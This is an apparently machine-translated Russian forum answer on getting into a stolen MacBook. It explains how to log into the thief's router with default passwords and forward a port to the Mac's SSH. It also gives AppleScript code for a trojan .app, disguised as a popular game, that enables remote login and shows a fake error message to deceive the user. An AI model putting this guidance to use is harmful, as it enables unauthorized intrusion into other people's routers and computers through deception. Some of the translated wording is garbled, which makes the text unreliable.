Я помню, как смотрел это видео доктора Зоза. Хорошая вещь.
Похоже, вы хорошо разбираетесь в сценариях оболочки и просто нуждаетесь в векторе атаки. Ключ к созданию чего-то похожего на то, что делал Zoz, - это получение доступа по SSH. В отличие от его ситуации, когда вор использовал коммутируемый модем, почти наверняка, так как более новые Маки не делают dialup, что вор использует широкополосное соединение и находится позади своего рода маршрутизатора NAT.
Даже если на компьютере был включен SSH, на маршрутизаторе нужно было бы настроить переадресацию портов, чтобы вы могли получить доступ к прослушивающему порту SSH машины извне. Преимущество широкополосного соединения в том, что IP-адрес почти наверняка будет меняться реже, чем при коммутируемом соединении.
Если бы я занимал ваш IP-адрес вора, я бы сначала попытался войти в веб-интерфейс его маршрутизатора и посмотреть, что я могу сделать оттуда. Удивительно, сколько людей оставляют свои стандартные пароли маршрутизатора / модема на месте, и в Интернете есть списки, где вы можете найти пароли по умолчанию для большинства крупных производителей.
Оказавшись внутри, проверьте список клиентов DHCP на маршрутизаторе и посмотрите, сможете ли вы найти MacBook. Многие маршрутизаторы будут показывать MAC-адрес (аппаратный), назначенный внутренний IP-адрес (чаще всего 192.168.1.x) и, самое главное, имя машины.
Выясните, какой IP-адрес назначен MacBook, а затем настройте порт для переадресации на него в настройках маршрутизатора. Используйте какой-нибудь внешний порт, отличный от 22, (например, порт 2222) и перенаправьте его на порт 22 IP-адреса MacBook.
Во многих маршрутизаторах включен доступ по SSH, поэтому доступ к IP-порту 22 вора может привести вас к оболочке маршрутизатора, а не к оболочке машины. Теперь у вас должен быть порт на внешнем IP-адресе вора (который вы получили из Dropbox), который доставит вас непосредственно к порту SSH, к которому должен быть привязан MacBook. За исключением того, что SSH еще не включен.
Эта часть требует некоторых действий от вора. Мне нравится идея электронной почты, но она требует, чтобы ваш друг использовал Apple Mail. Лучшим подходом может быть загрузка заманчивого файла .app в Dropbox, который включит SSH (удаленный вход).
Вы можете сделать это с помощью сценария оболочки, но сделав это с помощью Applescript, сохранив Applescript как .app и присвоив ему красивый значок, все это будет иметь большое значение для того, чтобы обмануть вашу цель и не выдать себя.
Вот код Applescript для включения удаленного входа:
do shell script "sudo systemsetup setremotelogin on" user name "Friend's Username" password "Friend's Password" with administrator privileges
Этот бит кода вернет строку с серийным номером машины, которую вы можете отправить себе по электронной почте, если хотите это сделать:
do shell script "sudo system_profiler |grep \"r (system)\"" user name "Friend's Username" password "Friend's Password" with administrator privileges
Я бы написал appleScript, чтобы он включал удаленный вход и делал все, что вам нужно. Старайтесь не создавать сценарии для GUI или любых приложений, кроме оболочки, так как это вызовет подозрения. В конце отобразится сообщение «Это приложение не может быть запущено на этом Macintosh». с кнопкой «Выйти», чтобы уменьшить подозрение. Когда сценарий будет работать в редакторе AppleScript, сохраните его как файл .app только для запуска.
Попробуйте замаскировать .app как популярную игру, Plants vs. Zombies или Angry Birds или что-то в этом роде. Вы можете экспортировать значок из .app реальной игры и поместить его в .app, который вы экспортируете из Applescript. Если ваш друг хорошо посмотрел на вора, вы можете сделать социальный профиль его / ее и замаскировать .app как что-то еще, что может заинтересовать его.
При условии, что вы можете настроить порт вперед (ваша отметка не обеспечивает надлежащие меры безопасности), и вы можете заставить его / ее запустить приложение, у вас будет полный SSH-доступ к машине и вы сможете продолжить поиск подсказок без немедленно отдавая свое присутствие. Это также требует, чтобы знак не уставал от уведомлений Growl Dropbox и выходил из него, поэтому я бы посоветовал вашему другу на некоторое время прекратить сохранять файлы в ее Dropbox.
Примечание. Если вор отключится от своего интернет-провайдера и снова подключится, он получит новый внешний IP-адрес. Добавьте файл в Dropbox и дождитесь его синхронизации. Это должно получить вам обновленный IP.
Примечание 2: Если пользователь не подключается к маршрутизатору с MacBook в течение определенного периода времени (обычно 24 часа), срок аренды DHCP для внутреннего IP-адреса, назначенного MacBook, истекает. Скорее всего, он получит тот же IP-адрес при следующем подключении, если в сеть не будет добавлено другое устройство. В этом случае вам придется вручную войти в маршрутизатор и изменить порт вперед.
Это не единственный способ атаки, но это то, что я буду делать, когда понял, что IP все еще обновляется через Dropbox. Удачи!
РЕДАКТИРОВАТЬ: «Права администратора» в конце каждой строки «do shell script» очень важны. Пользователю будет предложено ввести пароль администратора вашего друга, и сценарий не будет выполнен, если вы не включите имя пользователя и пароль в строку.